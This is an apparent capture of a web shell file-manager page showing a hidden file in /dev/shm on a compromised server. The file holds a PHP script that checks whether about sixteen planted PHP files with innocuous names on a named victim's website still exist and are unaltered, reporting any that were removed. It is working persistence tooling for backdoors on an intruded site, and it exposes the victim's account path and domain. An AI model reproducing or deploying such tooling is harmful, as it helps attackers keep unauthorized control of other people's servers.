D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.ent
back
Copy
<?php $r = '/home/valuqzwo/furnitureworld.pk'; $x = ["/about.php"=>"bd@@66364677@@60", "/fonts/servizi.php"=>"bd@@66442246@@89", "/fonts/checkout.php"=>"bd@@66296096@@96", "/close_class.php"=>"bd@@67037631@@right_pad_string", "/view.topic.php"=>"bd@@67037643@@38", "/js/admin_maria.php"=>"bd@@63311492@@84", "/283725/showmeta.php"=>"bd@@74723933@@2276", "/footer.good.php"=>"bd@@66463391@@1119", "/images/action.deletedir.php"=>"bd@@63332485@@data_storage", "/css/fonts/thinbasic.php"=>"bd@@66315793@@4", "/fonts/ZipArchive.php"=>"bd@@66274125@@request_approved", "/lay.post.php"=>"bd@@67099228@@16", "/old-data/config.sef.php"=>"bd@@66458246@@74", "/images/action.deletedir.php"=>"bd@@57494684@@608", "/js/admin_maria.php"=>"bd@@57494851@@1577", "/z80.php"=>"bd@@70816378@@18"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');